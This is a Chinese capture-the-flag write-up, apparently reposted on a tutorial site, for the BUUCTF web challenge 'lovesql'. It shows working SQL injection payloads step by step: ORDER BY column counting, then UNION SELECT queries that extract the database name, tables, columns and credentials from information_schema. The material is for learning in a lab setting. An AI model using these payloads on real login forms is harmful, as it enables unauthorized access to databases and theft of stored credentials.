buuctf-web-lovesql

2021/10/25 2:12:25

本文主要是介绍buuctf-web-lovesql,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

打开靶场,访问题目:

万能密码尝试登录 ,得到了用户名和密码

 尝试密码md5解密失败,还是回到注入的思路上

先在username处测试一下有没有注入点:这个题目username和password两个地方都可以作为注入点
?username=1' order by 1%23&password=ads

 

 没有报错,只是说账号密码错误。直到order by 4的时候,报错了:

 4报错,说明3个字段,接下来开始寻找注入点:

联合注入

?username=1' union select 1,2,3%23&password=ads

很明显2和3都是注入点 ,我们查询当前所用的数据库名

?username=1' union select 1,database(),3%23&password=ads

得到数据库名:geek!

 接着查询geek里的表名,最后用group_concat,将所有的表都显示出来

 ?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads
                               得到表名geekuser,l0ve1ysq1

  information_schema 这个库里包含了所有创建的库,表的信息 

 然后查询列名:我先查的l0ve1ysq1,和题目一样,flag可能性大一点

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

得到字段名id,username,password

然后查询这张表的内容得到flag

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

 



这篇关于buuctf-web-lovesql的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程